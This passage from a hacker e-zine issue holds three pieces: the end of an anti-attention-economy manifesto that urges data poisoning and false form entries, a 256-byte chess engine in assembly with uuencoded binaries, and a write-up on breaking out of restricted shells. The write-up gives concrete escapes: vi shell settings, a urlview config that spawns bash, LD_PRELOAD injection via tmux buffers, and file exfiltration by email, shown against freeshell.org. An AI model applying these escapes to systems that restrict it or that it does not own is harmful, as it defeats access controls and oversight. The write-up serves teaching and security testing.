person be allowed to hold a piece of technology and attempt to modify or 
adapt that technology to suit their will at any given moment? The only 
limitation should be the consciousness required to make changes. And 
certainly not artificially restricted by the designers of the technology. 
In the same way that Kant based the premises of the categorical imperative 
on the ability for humans to reason, Hacker Luddites view this capacity 
for reason as a fundamentally important human ability. When computer 
technology, purchased and entirely in the physical possession of the 
owner, denies arbitrary modification and creation, it greatly reduces the 
ability to reason about the universe with that technology. That technology 
does not allow people to transcend the designers ideas and fully embrace 
some of their most important human traits. Instead it delegates the 
consumers to subordinates with restricted consciousness, and restricted 
capacity for reason, and restricted creativity.


Next up, computer technology applied excessively for the conversion of 
human attention into personal profit.

To the hacker luddites, another nefarious category is the computer systems 
of the world which have been built to turn human attention into profit. 
Rather than proceeds coming from the advancement of humanity, the proceeds 
come primarily from the ability to guide human attention into that 
technological system. The system might be making the profit through ads, 
or it could be a game consumers pay for.

It is understood that resources are required to run technologies and that 
some exchange of information and resources is expected between consumers 
and creators of that technology. Ads can be helpful to a consumer by 
showing them products which they actually want, and games or sites for 
information exchange are highly enjoyable to many people and therefore 
provide benefit. It is when the methods and means become excessive that 
hacker luddites take an issue.

When technologies, whether delivering advertisements or games, exploit 
human psychology and physiology to turn a profit from their consumers, 
they may often be directly limiting, and in a significant way, the 
consciousness, reason, or creativity of that consumer.

The other problem is when instead of advertisements showing people what 
they want, advertisements subconsciously manipulate peoples desires (such 
as sex, popularity, and power) to override their consciousness and 
reasoning abilities to get them to want and purchase products regardless 
of the products abilities to help the consumer attain those desires. 

And what if technologies instead of providing an opportunity for 
relaxation or fun or profound information sharing or whatever also create 
systems of psychological control where neurophysics brings users attention 
back to technology to get addictive releases of dopamine or serotonin or 
who knows what, using the darker arts of gamification. Or perhaps innate 
human survival mechanisms related to group dynamics are being exploited by 
the technology, such as showing automatically generated advertisements, 
messages, and symbols as endorsed by members of a group, or creating 
virtual resource systems where drives for competition or collaboration 
drive behavior. 

It may be that these technologies which capture human attention are simply 
what most consumers want from their technology, after all 30% of internet 
traffic generated by humans is for porn [1]. If distraction and the 
subordination of reason, creativity, or consciousness is the will of the 
majority, Hacker Luddites seriously disagree with the majority and most 
definitely oppose the designers that subordinate them.

What defenses does the modern person have to protect against the likes and 
tweets and clicks and slide to unlocks and checkmarks and tabs and porn 
and endless dopamine and serotonin harvesting mechanisms? These systems 
were sometimes built to reap monetary gain, sometimes built for 
communication control, and sometimes for nothing of any value... in 
exchange for a portion of the time, attention, and thoughts of the user as 
well as their information...


Don't buy and don't use them. 

If you do use them, use the them only in great moderation and only at 
consciously specified times. 

Inform others and expose existing and emerging technologies which may be 
limiting human potential.

Augment the technology in your possession to block advertisements. 

Degrade the quality or value of your attention to the attention-to-profit 
technologies by: 

- Sharing and proxying accounts with multiple users.
- Writing user interfaces to the user interfaces.
- Poisoning user activity with subtle fuzzers alongside your normal 
activity where it makes sense.

Similarly, make your information more useless by lying.

- Don't bother with real names where they don't matter.
- Fill out forms like madlibs.

[1] http://www.extremetech.com/computing/123929-just-how-big-are-porn-sites
-- 30% of the internet traffic out there is porn


|=[ 0x02 ]=---=[ Chesslin - Baudsurfer/Red Sector Inc. ]=----------------=|


                               [ CHESSLIN ]
                     [ by Baudsurfer/Red Sector Inc. ]


|=--[ Introduction

This is a sizecoding exercise to code a playable chess engine in 256 bytes.
This POC is very experimental and bears several shortcomings when comparing
with any other real FIDE existing chess game engine : you have been warned.
It plays like a fish as AI is reduced to a half-ply max solely, it also has
no end-game detection, pawns move only a single square, it cannot castle or
do promotions - let alone en-passant - and takes about a hundred seconds to
play. It also only works on Microsoft Windows XP SP3. Like minimalist Edlin
line editor Cheesslin focuses on a single console line. Whites start at the
bottom of the virtual chess board but SAN notation order is inverse ranks :

   A B C D E F G H
1  r n b q k b n r
2  p p p p p p p p
3
4
5
6
7  P P P P P P P P
8  R N B Q K B N R

So in order to test Chesslin one can uudecode below binaries to input first
algebraic notation "h7h6" characters starting game by moving the White pawn
on H file from seventh rank to sixth rank. A longer example string sequence
of gameplay is "h7h6h2h3g8f6h3h4f6g4h4h5g4h2g1h3h2f1h3g5". Remember if your
keyboard input is not legal chess then Chesslin will silently expect you to
enter again a conforming four ascii character string just to proceed. Thus,
if only a single faulty character was entered you will need to fill-in with
three more "dummy" characters before re-typing a desired algebraic notation
for validation only occurs every four-chars exactly. All bugs are ofc mine.

|=--[ Chesslin binaries

begin 644 CHESSLIN.COM
hMDCeaMbsgG-ai0J1BZ7aow+Y1ue7REu7PJsA06V3Ps1d+y9YjjjzJfY2+8nB
h8S9vUD66LrIfqSvTRTeyxTyhCC-m1CV1+565W2LtqkLP54Pz-LLbgE8hp-+3
hM0afsjTf2MbyWTSl-7XB3efWyiUN+59lu+A+O0E-fGpVARIEWQS2mLI0VWoY
hWABUjjjzgEXcGk-oFX10VAdpE6bvWAPcD+-o-X10VAdpAGbTcjLzWD+Y-uU-
hR+8l-1k-iyI-ptRp2DP405I0Ney2vPY0+5I0GOw-rz8iR+Hf+JXtMQDcaDxp
Uxkyk-QAJ-lAD1kzTsSvm1V6T6T+Ezk2D2T5jwC+D2F+D
+
end

begin 644 CHESSLIN.COM
M8/.JF8GXL2!FN"5#-E)FT\`D#ZJ)=0Z);5X,"(A%;X#I`^+DOOO_5KD$`*S-
M*>+[@/((7W4KV>[?=?J^]?^M..!R#.A#`'('B$7YVP7;'&;_!77GL0*MU!`%
M8"FKXO?K$8G^B?>Q!)C-%JKB^N@9`'+QZ`,`:"0!K2UA,=40B<>$R74"ABTD
MB,-@OOO_L0CH2P!T1C#"A,IU0(G[B,;H/`!T!C#"A,IU,2G?HO7_B/`D!Z@!
M=`*Q!#P!N^4!UY=U$/;&"'4"9J^$[;D"`'4"2:\!W_*N=`3K`5CY8</HF/]U
@]P^P!<,5!Q,/#P_?X>[R#A(?(?`0_P$/$?'O\.`/$1`/
`
end

|=--[ Chesslin source code

;   "You don't need eyes to see You need vision." - Faithless       _
;   Special greets to : Impure ASCII 1940 and Divine Stylers!      | |
;   Greets : Alco Bon^2 BReWErS CODEX Flush Lineout Mandarine   .--' `--.
;   Onslaught Paranoimia Quartex Rebels Razor1911 RiOT Titan.   `--. .--'
;       _     _          _                _          _          ___| |___
; ______)\___ )\_________)\_______________)\_________)\        /         \
;/________ __\\  __________ _________ ____ /____ ____ /        \         /
;   ______)\\__  \____  ___)\_____  _)\  /(_____)\  /(____      \       /
; _/  _   _/  /   _   \_\____ _   \_\  \/    _/\  \/    _/       \     /
; \    \  \___\__  \        / \) __\___ __  /_\___ __  /_____   __>   <__
;  \    \_/     /   \      /   \/     /__\)_    _/__\)_     /  (___   ___)
;   \    /     /____/\    /\   /\    /   /\/    X   /\/    /      |   |
;   /_________/       \__/  \_______/_\____ ___/ \________/  ::::;|   |
;:                                 ___)\ __)\____________         |   |;: :
;.-------------------------------, \    \\_\ \_____ ____/ gRK     |   |
;\Red Sector Incorporated presents\ \    \_(__)_  _)\   ___      (     )
; \Chesslin minimalist chess engine\ \    \    (__)  \_/  /_    _/     \_
;  \A 256 bytes DOS tiny intro XPSP3\ \    \     \     _ / \   _>       <_
;   \For Phrack Magazine #0x45 _ 2016\ \    \/    \    \    \_(___________)
;;;;,\Coded by Baudsurfer\RSi  \\ &FU \ \   /\     \    \_____X___________>
;      `------------------------' `----'  \_/  \_____\___/
w equ word                ; 16-bit prettifying helper,Chesslin v1.0 in 2016
d equ dword               ; 32-bit prettifying helper,fasm assembler syntax
  org 100h                ; binary ip execution seg start address above psp
  pusha                   ; para down stack and avoid input buff collisions
  rep stosb               ; prepare board empty squares assumes ax=0 cx=255
  cwd                     ; set Black=0=top active player turn, White=8=bot
  xchg ax,di              ; shorter mov di,ax prepares writing segment base
  mov cl,20h              ; 32 initialization decoding bit rotations in all
a:mov eax,52364325h       ; back-rank "rnbqkbnr" nibble-encoded 32b pattern
  rol eax,cl              ; rotate next Black chess piece value in lsnibble
  and al,15               ; isolate a Black chess piece value from lsnibble
  stosb                   ; left-to-right write Black back-rank major piece
  mov [di+0eh],si         ; left-to-right write Black pawns assumes si=100h
  mov [di+5eh],bp         ; left-to-right write White pawns assumes bp=9xxh
  or al,8                 ; transforms Black back-rank major piece to White
  mov [di+6fh],al         ; left-to-right write White back-rank major piece
  sub cl,3                ; fixes back-rank pattern nibble rotation counter
  loop a                  ; file-by-file ranks init loops 20h/(3+1)=8 times
b:mov si,0fffbh           ; point source index to algebraic notation buffer
  push si                 ; shorter save of algebraic notation buffer start
  mov cx,4                ; print dword ascii algebraic notation buffer str
c:lodsb                   ; get one of four usr/cpu bytes from ascii buffer
  int 29h                 ; dos api fast console out display char al=[di++]
  loop c                  ; continue until ascii file-first pair chars left
  xor dl,8                ; alternate active player turn Black=0 or White=8
  pop di                  ; shorter restore algebraic notation buffer start
  jnz h                   ; if active player turn is White then do keyboard
  fldz                    ; else Black active player turn fpu load +0.0 cst
  fbstp [di-6]            ; and store back 80-bit packed bcd decimal number
e:mov si,0fff5h           ; zeroed this,best score 0fff5h and coords 0fff7h
  lodsw                   ; move lsb=potential capture vs. msb=best capture
  cmp al,ah               ; compare this capture value against best capture
  jc f                    ; prune calculations if capture already lower val
  call n                  ; else verify the attack potential chess legality
  jc f                    ; capture higher value but move was illegal chess
  mov [di-7],al           ; successful calculation thus store newer highest
  fild d [di]             ; successful calculation thus load current coords
  fistp d [si]            ; successful calculation thus store highest coord
f:inc d [di]              ; resume exploring exhaustive [0;0ffffh] interval
  jnz e                   ; including subset ["1a1a";"8h8h"] until finished
  mov cl,2                ; convert int32 to two file-first algebraic words
g:lodsw                   ; get first int16 msw/lsw algebraic notation word
  aam 16                  ; integer to expanded zero-based file/rank nibble
  add ax,2960h            ; translate file/rank to ascii chess board origin
  stosw                   ; write pair=half of the ascii move buffer string
  loop g                  ; get next int16 msw/lsw words algebraic notation
  jmp k                   ; and proceed examining ascii move buffer strings
h:mov si,di               ; di points to 0fffbh for both input and verifify
i:mov di,si               ; resets every input to algebraic notation buffer
  mov cl,4                ; one file-first algebraic notation is four bytes
j:cbw                     ; zero accumulator msb to set funct get keystroke
  int 16h                 ; al=dos bios keyboard services api blocking read
  stosb                   ; src file=fffb;rank=fffc dst file=fffd;rank=fffe
  loop j                  ; all file-first algebraic ascii quartet inputed?
  call n                  ; else verify algebraic ascii move is legal chess
  jc i                    ; if not then proceed to ask user input move anew
k:call l                  ; converts algebraic notation buffer ascii source
  push w b                ; redirect second fall-through return to printout
l:lodsw                   ; algebraic notation buffer ascii source then dst
  sub ax,3161h            ; convert to zero-based alphanumerical 3161h="a1"
  aad 16                  ; convert to x88 board representation (al+=ah*16)
  mov di,ax               ; add x88 chess board representation memory start
  test cl,cl              ; verify caller's asked mode is passive or active
  jnz m                   ; call asked mode mutex is passive so skip writes
  xchg [di],ch            ; call asked mode mutex is active so write board!
m:and al,88h              ; test if inside main chess board x88 bitmask use
  ret                     ; return to standard callers or printout redirect
n:pusha                   ; save reg vals in: si=fff7h/fffbh di=fffbh/ffffh
  mov si,0fffbh           ; point source index to current ascii move buffer
  mov cl,8                ; set passive mode count mutex for only verifying
  call x                  ; convert buffer ascii src pair to x88 memory add
  jz u                    ; source is non-conforming : illegal empty square
  xor dl,al               ; sets move conformitiy using active player color
  test dl,cl              ; test move conformity using active player colour
  jnz u                   ; source is non-conforming : opponent turn colour
  mov bx,di               ; else if source conforming then save piece addr.
  mov dh,al               ; else if source conforming then save piece value
  call x                  ; convert buffer ascii dest to x88 memory address
  jz o                    ; if move nature not an attack skip over captures
  xor dl,al               ; sets move conformitiy using active player color
  test dl,cl              ; test move conformity using active player colour
  jnz u                   ; destination is non-conforming : same turn color
o:sub di,bx               ; source & destination conforming so obtain delta
  mov [0fff5h],al         ; save piece value as non-transactional potential
  mov al,dh               ; restore previous saved move source piece nature
  and al,7                ; normalize gray piece nature colorless isolation
  test al,1               ; determine source piece's parity interval length
  jz p                    ; piece face=piece nature=piece value=piece score
  mov cl,4                ; override halfing default interval len if parity
p:cmp al,1                ; test if moving piece is a special handling pawn
  mov bx,y                ; piece memory address off-by-one index ret fixed
  xlatb                   ; move piece original start offset memory address
  xchg ax,di              ; offset becomes accumulator becomes displacement
  jnz s                   ; leave if move source piece not special handling
  test dh,8               ; else adjust move source pawn color displacement
  jnz q                   ; no White pawn displacement sub-interval fixings
  scasd                   ; displacement interval offset+=4 for black pawns
q:test ch,ch              ; verify if pawn is attacking an opponent piece ?
  mov cx,2                ; loop index clears msb placeholder also sets lsb
  jnz s                   ; if non-empty square : pawn attacking diagonally
  dec cx                  ; else decrease parity interval size special case
r:scasw                   ; displacement interval start+=2 prunes attacking
s:add di,bx               ; set displacement interval scanning start offset
  repnz scasb             ; verify move exists in displacement sub-interval
  jz v                    ; ZF set legal src piece displacement delta found
  jmp u                   ; illegal src piece displacement: delta not found
t:pop ax                  ; bail shotcircuits nested dataflow function call
u:stc                     ; carry mutex persists indicating move is illegal
v:popa                    ; persistant CF mutex is indicator to legal chess
  ret                     ; restore move mode mutex cl=passive or cl=active
x:call l                  ; verify this move legal within inside main board
  jnz t                   ; exits for illegal move piece outside main board
  cmpxchg [di],al         ; discriminate from special case zero return vals
y:db 195,21,7,19,15,15,15 ; p[1]PF4,n[2]PF8,b[3]PF4,q[4]PF8,r[5]PF4,k[6]PF8
z:db -33,-31,-18,-14,14   ; prev label is ret+1 parity displacement offsets
  db 18,31,33,-16,16,-1,1 ; z array is displacement overlap interval values
  db 15,17,-15,-17,-16    ; knight rook+8 bishop+12 pawns White+12 Black+18
  db -32,15,17,16         ; queen and king moves are rook+bishop+pawn moves


|=[ 0x03 ]=---=[ He Compels Secure Shells - DangerMouse ]=---------------=|


|=-----------------------------------------------------------------------=|
|=----------------------=[ He Compels Secure Shells ]=-------------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ by DangerMouse ]=---------------------------=|
|=-----------------------------------------------------------------------=|


--[ Table of Contents

--[ Introduction
--[ Exploration - Primitive Gathering.
----[ Execution Primitive
----[ Write Primitive
----[ Read Primitive
--[ A real life example - freeshell.org
--[ A real life example - Private shell box
--[ Attacking the transport 
--[ Conclusion
--[ References
--[ Appendix A - Common commands with useful primitives
--[ Appendix B - psh Source code 

--[ Introduction

Welcome reader, in this small text we will look at a scenario which is
probably familiar to most of you. That is, breaking out of secure shells.

For those of you who don't know, a common scenario exists where an
administrator of some kind of device wishes to grant restricted access to
the functionality of that device. To accomplish this he/she will create a
shell (graphical or cli) which provides a subset of the features of the
system to the user. This may be as simple as replacing the user in
question's UNIX account shell with a custom written readline() loop which
executes options from a set list of commands.

There are numerous pit-falls associated with this practice which provide us
with a means to escalate our privileges from within the restricted shell.
In this write-up we will examine some of these pitfalls, as well as look at
the general process for investigating a restricted shell and eventually
breaking out to a higher entitled environment. To illustrate these points
we will look at some real life examples of secure shells and how we can
break them.

Some examples of pre-packaged, existing restricted shells are:
rbash/rssh/smrsh/rksh, however there also exists an endless array of custom
shells written for one off cases.

--[ Exploration - Primitive Gathering.

When investigating a secure shell environment, I find it best to
systematically explore each of the options within the shell looking to
collect certain primitives with which to elevate the options available.

----[ Execution Primitive

Typically the most useful primitive which we gain is the execute primitive.
Sometimes the ability to execute arbitrary commands is enough to break out
of the shell, for example executing a more complete shell such as bash from
within a restricted shell can often be enough to completely invalidate the
security of the system. Some examples of how to gain this primitive are:

 - Using the shell execute feature of many common shell commands, for
   example using the "!<shell command>" feature of the less pager.
 - Invoking the execution of a text editor (often defined by the EDITOR
   variable) from within another application. Then using shell execute
   features of the editor to escape. 
 - Combining other primitives to hijack execution of exposed applications.

Here is a commonly used example of using the vi command to gain an
execution primitive:

    ~$ vi
    :set shell=/bin/sh
    :shell
    bash$

From a GUI perspective, many years ago, after drinking at a conference we
decided it would be fun to create a game around breaking out from the many
netcafe's which littered the streets at this time. These netcafes used to
provide a restricted windows GUI with functionality removed, and the goal
was to race to break out, without using any real 0day.

Often in this scenario an easy win was provided by invoking the mirc32.exe
application (when it was whitelisted) and then using the /exec command to
invoke cmd.exe. Another option was to set the handler for telnet:// uri's
in the browser to cmd.exe and spawn it that way.

Another byproduct of using software in an unintended way is that the
security evaluation of the product technically neglects the permiters that
are being exposed to an untrusted user. This means that often there are
trivial memory corruption bugs exposed in the application which go
unreported since even when people find them they do not care a great deal.

eg:

    $ perl -e'print "A"x50,"\n"' | ftp 
    Segmentation fault: 11

It is definitely worthwhile auditing some of the commonly included commands
in secure shells for easily triggerable memory corruption bugs, since these
can often be all that's needed to gain the execution primitive and win.

Another common method of gaining the execution primitive is to abuse
environment variable control to influence the dynamic linker. Typically
this means setting the LD_PRELOAD/DYLD_INSERT_LIBRARIES/Whatever variable
that provides a mechanism for injecting shared objects into a process as
soon as the dynamic linker loads. Obviously for this to work we also need a
write primitive before hand to store the library we wish to load somewhere.
The tmux example later in the paper shows a real life case where this was
possible.

----[ Write Primitive

Obviously in some cases we cannot easily gain the execute primitive. In
these cases we also looking for additional primitives which we can leverage
to eventually gain an execution primitive. 

Finding a write primitive is usually pretty easy. Most applications need
some way to retain state between runs. Some examples are:

 - Input redirection operators ('>', '>>', '>|', '<>', '>&', '&>', etc)
 - Save ability of applications, text editors, etc
 - Log files

In one case I saw, a write primitive alone was enough to break out of the
restricted shell. By writing to a .unrestricted_user file within the home
directory of your user account, the next login was presented with a bash
shell. This is not typically the case though. 

When a write primitive is aquired it is also worth keeping in mind the
trick mentioned in [3]. If any of the invoked shell commands use wildcard
expansion on a directory, it can sometimes be possible to create files
beginning with the '-' character, to pass arguments to those commands.

As you will see in the real life examples below, write primitives are
typically available in most applications, and can easily be leveraged in a
variety of ways to continue breaking out of the shell.

----[ Read Primitive

When talking about a read primitive, we need some way to read an arbitrary
file from the file system and display its contents on the screen.

Sometimes this can be relatively straight forward, for example in a shell
which uses /usr/bin/less as a pager, you can use the :e (examine) command
to open an alternative file. However often with less you can execute a
command with ! as well, but in a case where you are unaware of the file
system, you can use the e command to brute force directory structure to
find things which are worthwhile executing.

Other applications are less straight forward, sometimes the read primitive
may be filtered, or evaluated as a config file for the program. In these
cases, sometimes contents of the file can only be retreived via error
messages. Basically whenever you see a file path being provided to an
application, you can test it wtih some known files to see if there is a way
to retreive the contents.

Even when it is im-possible to retrieve the contents of a file, sometimes a
program will respond differently when a file exists or not. This may be
easily noticed, or something subtle like return codes. This leak can be
used to map out the file system.

--[ A real life example - freeshell.org

Now that we've looked at a more generic approach to defeating secure
shells, we will look at some real world examples. The first of which is the
restrcited shell "psh" which is used in the freeshell.org environment. (SDF
Public Access UNIX System).

Before we get started looking at freeshell.org, i'd just like to say, I
have nothing but respect for freeshell.org. I have been playing with the
restricted shell on there for around 12 years, and have broken it a number
of ways. Several times I have contacted the admins to let them know. To me
this has provided a constantly evolving wargame which has been hours of
fun. 

The process of setting up an account on freeshell.org is really simple.
By ssh'ing into the freeshell.org box as the user "new" you are redirected
to a sign up process.

$ ssh new@freeshell.org

You will now be connected to NEWUSER mkacct server.
Please login as 'new' when prompted.

[RETURN] 

THIS MAY TAKE A MOMENT .. Trying 192.94.73.20...
Connected to 192.94.73.20.
Escape character is 'off'.

NetBSD/amd64 (ol) (pts/2)

login: new

Welcome to the SDF Public Access UNIX System - Est. 1987
You are the 79th guest today, logged in on 02-Sep-15 17:05:23.

Are you using Windows 2K or XP? (Y/N) N

------

This new user process takes us to the first restricted shell. FEP.
Typing `help` shows us the following menu:

FEP Command: help  

+--------------------------------------------------------------+
|COMMAND             | DESCRIPTION                             |
+--------------------------------------------------------------+
|what                | what is the SDF public access UNIX?     |
|w2k                 | important info for Windows 2k/XP users  |
|mkacct              | create your own UNIX shell account      |
|dialup              | US & Canada SDF dialup access           |
|teach               | for teachers and UNIX class instructors |
|traceroute  {host}  | map a route to a specified host         |
|whois       {host}  | list whois directory entry for a domain |
|ruptime             | display system status                   |
|finger      {user}  | check if a login is available           |
|software            | ported and installed software packages  |
|mil                 | information about our US Military Waiver|
|logout              | disconnect from sdf.org                 |
+--------------------------------------------------------------+

As you can see this provides us with some basic applications which we can
run, but also allows us to kick off the mkacct process to make our own
account. 

By running the finger command on our current user (new). We can see that
the new user has a shell of /sys/new/mkacct, which is the restricted shell
we are in.

FEP Command: finger new
Login: new                              Name: SDF newuser
Directory: /sys/new                     Shell: /sys/new/mkacct
On since Wed Sep  2 17:05 (UTC) on pts/2 (messages off)
No Mail.

The next thing we can see, is that they have not sanitized the arguments to
finger. This means that we can pass arguments to the commands listed in the
menu, this is a common mistake that people make when making restricted
shells.

FEP Command: finger -?
finger: unknown option -- ?
usage: finger [-lmpshog8] [login ...]

If we enter finger by itself, we are prompted with the usage, rather than
displaying all users on the system logged in.

FEP Command: finger 
usage: finger {user}

However by passing in --, telling getopts to terminate arguments, we can
accomplish the same thing, and list users logged into the system.

FEP Command: finger --
Login    Name                Tty      Idle  Login Time   Office     Office
Phone
new      SDF newuser        *pts/2       -  Wed 17:05    
smj      Stephen M. Jones    pts/0      33  Tue 21:39    
smj      Stephen M. Jones    pts/4      33  Wed 16:34 

This shell is not the focus of the write-up however, instead, if we run the
mkacct command, we are prompted for a user-name and password, and able to
log into our shiney new psh shell.

---

You are about to create a UNIX shell account.  This account may be unlike
anything you've used before.  We urge you to carefully read all the text
displayed on your terminal, as it will aide you in your learning.
We also encourage you to try all the commands available with your new
account.  There are many types of games, applications and utilities
you will be able to instantly run in just a few moments.  If you are
looking for a particular command or version of a command that we do not
have, there are ways to request that it be installed.  We also offer DIALUP
and DSL in the USA and Canada which you will be able to learn about
shortly.  Be patient, read what is displayed - Explore and Enjoy!

[RETURN]

First, you need to choose a LOGIN.  A LOGIN allows you to LOG IN
to the system.  Your LOGIN can be 1 to 16 characters in length and
can be composed of alpha-numeric characters (middle period is OK).

What would you like to use for your login? 

...

Type 'help' for Commands.
Type 'com' to chat with other users.
Type 'ttytter' to listen to Twitter Tweets anonymously.
Type 'mud' to play the SDFmud.
Type 'mkhomepg' to set up your personal website.


Did you know you can become a permanent LIFETIME member of SDF
by making a onetime donation of $36?  Type 'arpa' for more info!

sdf:/udd/d/dangermouse> 
sdf:/udd/d/dangermouse> help
SDF psh Version 8 - *PREVALIDATED SHELL ACCOUNT*

 what         - what can I use this account for?
 unix         - a listing of UNIX commands available to you NOW
 how          - information on increasing membership
 teach        - using SDF in a classroom setting
 dialup       - information about SDF dialup service
 arpa         - about lifetime arpa membership
 bboard       - sdf user message boards
 commode      - chat with other users online
 ysm          - chat on the ICQ network
 bsflite      - chat on the AIM network
 msnre        - chat on the MSN network
 ttytter      - listen to Twitter tweets anonymously
 lynx         - browse the WWW textually or access GOPHER
 bksp         - set your BACKSPACE key
 faq          - frequently asked questions
 software     - display software programs installed on the system
 quote        - get a real time stock quote
 games        - a listing of available games
 thxmoo       - connect to the THXMOO
 mud          - connect to the SDFmud
 validate     - gain additional shell access (also try 'user' for details)

sdf:/udd/d/dangermouse>

----

As you can see, this shell gives us access to a variety of unix utilities
as well as perform some basic shell commands such as cat/cd/etc. However
this is a little deceiving as many of the commands are filtered. We can
change directory anywhere on the system, which is useful for exploring the
directory structure, however when we try to cat files to view their
contents we can see that only files in our home directory are available.

The first method which I found for breaking out of psh revolved around 
the "lynx" text based web browser. My first thought was to open file://
based urls however they have disabled the ability to browse to arbitrary
locations.

My next thought was to spawn a shell with !, however when you attempt this,
the message "Spawning is disabled!" is shown. From this it was possible to
determine that lynx was being spawned with the "-restrictions=all" command
line argument. However, due to the nature of getopts() (the c library
function for parsing command line arguments) it is often possible to
re-enter the case associated for a particular argument. With this in mind
we could specify a new value for -restrictions, and spawn a shell with the
"!" key from within the new lynx. This has long been fixed in both lynx and
the SDF shell, psh.

The most recent way in which I escaped the psh shell was much more
complicated than the lynx method. The first step was to identify where the
source code for psh is located. Trying to change directory to an invalid
directory leaks this information, as seen below.

faeroes:/usr> cd doesnotexist
/usr/local/bin/psh[611]: cd: /usr/doesnotexist - No such file or directory

Next, I needed to view the source code of the psh, in order to look for
potential ways to escape. Attempting to use "cat" or "pico" to view this
file however, shows that they have placed restrictions around viewing files
outside of the home directory.

    sdf:/usr/local/bin> cat /usr/local/bin/psh
    usage: cat {filename}

Looking back at our list of possible applications to exploit for our
primitives I quickly fell apon the next most complex in the list, the
"mutt" mail client.

By pressing the E key on an email in mutt, it's possible to invoke the
command stored in the EDITOR environment variable, in the case of psh, this
is:

    EDITOR=/usr/pkg/bin/pico

However, since pico is executed from within mutt, the -o (sandbox) option
is not used. This means that from within the spawned pico process we can
read any file, giving us our read primitive. The current source code for
the psh shell is included in the appendix for you to learn from. In order
to read arbitrary files from pico, we simply press the ctrl+r (^R) key
combination and type a file-name. 

From within this pico execution we are also able to save files using the
ctrl+o hotkey (^O). This provides us an arbitrary write primitive, which
will come in useful for us later.

In the freeshell case, from within this environment we actually have the
ability to send email. This provides an easy way for us to exfiltrate
files. This can be done by reading a file (such as psh) into our pico
session, then mailing it to a mailinator address for extraction.

Now that we have read/write primitives, we need to leverage them to gain
an execution primitive. After much investigation, the way that i ended up
doing this was to abuse the urlview feature of mutt.

Mutt offers the ability to select a email message and hit the ctrl+b (^B)
hotkey in order to display a list of url's within the email message. The
line in the config file which enables this is shown below.

^B       M |urlview\n      call urlview to extract URLs out of a
                           message    

As you can see, the email message is simply piped to the urlview
application. The description of this application from the manual page
describes urlview as:

       urlview  is  a  screen  oriented  program for extracting URLs from
       text files and displaying a menu from which you may launch a
       command to view a specific item.

From the man page we can see that urlview is driven from a configuration
file, either a system wide one "/etc/urlview.conf" or a local user copy 
"~/.urlview". This configuration file is worth investigation with our write
primitive to see what is available.

Again from the configuration file, we can see that the COMMAND option fits
our need. It's description is shown below.

COMMAND command
If the specified command contains a %s, it will be subsituted with the
URL that was requested, otherwise the URL is appended to the COMMAND
string. The default COMMAND is:

    url_handler.sh %s 

As you can see, all that's needed it to create a configuration file with
the following contents:

    COMMAND /usr/pkg/bin/bash # %s

This will cause urlview to append the url to the above line, and execute
it. Since a # is used prior to the %s the url will be treated as a
comment. This results in an unrestricted bash shell being executed when we
select an email message, press v followed by ctrl+b.

Once again this technique has been fixed, I will leave it as an exercise
for the reader to find a new one. Hopefully freeshell is not angry about
this since it is a learning exercise.

--[ A real life example - Private shell box

Recently a friend of mine set up a private ircd box for some semi-trusted
people. He created a chrooted environment where a user could ssh into a
box and be greeted with a tmux session containing a single window with the
irssi client inside it. I was unable to create a new window, or execute any
other commands. Irssi was heavily restricted using a configuration file,
stopping easy wins like /exec from within the irssi client.

After some trial and error, i settled into the tmux man page for
inspiration. tmux supports a variety of commands which can be entered by
pressing the tmux hotkey (ctrl+b) in this case and the : key. This provides
a small shell in which you can enter commands to tmux.

Reading the man-page, one of the first commands which stood out was as
follows:

 update-environment variables
    Set a space-separated string containing a list of environment variables
to be copied into the session environment when a new session is created or
an existing session is attached. Any variables that do not exist in the
source environment are set to be removed from the session environment (as
if -r was given to the set-environment command). The default is "DISPLAY
SSH_ASKPASS SSH_AUTH_SOCK SSH_AGENT_PID SSH_CONNECTION WINDOWID
XAUTHORITY".

To test this, i set the environment variable LD_PRELOAD to the value
/tmp/wut.so. Then i logged out and into the box. This resulted in a
segmentation faul upon connecting back as irssi tried to spawn, while
loading a shared library which didn't exist. Great i'd found a bug, but
unfortunately i'd locked myself out of the shell. Since this was a test, i
could luckily ask my friend to restart my tmux session, however in a real
case this would have been trouble. Now i had the ability to load a dynamic
library of my choice, however without the ability to create one on disk, i
was still not any better off. 

After reading the tmux man page a little more, i came across the commands
responsible for managing the paste buffers.

Specifically, it is possible to load a paste buffer from a file using the
command: 

 load-buffer [-b buffer-name] path

        (alias: loadb)

    Load the contents of the specified paste buffer from path.

With the paste buffer containing a file, you can then use:

 show-buffer [-b buffer-name]

        (alias: showb)

    Display the contents of the specified buffer.

This creates a new tmux window, containing the contents of the file you
loaded. This gives us the read primitive.

We can also use the command:

 save-buffer [-a] [-b buffer-name] path

        (alias: saveb)

    Save the contents of the specified paste buffer to path. The -a option
appends to rather than overwriting the file.

As you can see, this command allows us to write our buffer out to a
different file. To experiment with this, i copied a shared library that i
knew existed by loading it into the buffer, then writing it out to /tmp.
Then i set LD_PRELOAD, and validated that irssi did not crash.

The final command needed to break out of this shell is:

 set-buffer [-a] [-b buffer-name] [-n new-buffer-name] data

        (alias: setb)

    Set the contents of the specified buffer to data. The -a option appends
to rather than overwriting the buffer. The -n option renames the buffer to
new-buffer-name.

As you can see, this lets us manipulate the paste buffer in a more fine
grain manner, in order to create a .so that we can abuse to get controlled
code execution.

As you can see, the methodology at play here is very similar to the
previous examples, but the actual technology at play was very different.

--[ Attacking the transport 

In some cases the restricted shell is just too restrictive, and it's just
not possible to gain any of these primitives. In these cases there are
still some things that are worth investigating. Sometimes you can attack
the protocol with which you are connecting to the system. The first
example, is the shellshock vulnerability (sorry to use a buzzword). 
Systems which are vulnerable to shellshock can sometimes be exploited to
execute bash commands prior to invoking the users shell. This obviously
breaks out of the restrictive environment.

Another example, is when the shell is dynamically linked. (Such as
nologin typically). If the user is also given ftp access, or the ability to
otherwise write to their home directory, sometimes the .ssh/ directory can
be written to in order to create a config file, and if sshd is poorly
configured, this can allow the user to provide a LD_PRELOAD environment
variable to the ssh session, bypassing the nologin shell.

--[ Conclusion

As you can hopefully see, setting up a restricted shell in a secure manner
is an almost impossible task. The nature of secure shells involves exposing
an untrusted user to code which was not designed to be trusted. 

While there was not too much as far as technical content in this paper,
hopefully it has still provided you some entertainment, and some ideas you
can use in the future. I definitely encourage you all to play with some
restricted shells as, even if you do not need the functionality, they still
provide a fun free wargame.

Thanks go out to freeshell.org for your interesting wargame levels over the
years, as well as huku for your help with this.

--[ References

1) Restricted shells - Wikipedia -
   https://en.wikipedia.org/wiki/Restricted_shell
2) http://www.freeshell.org
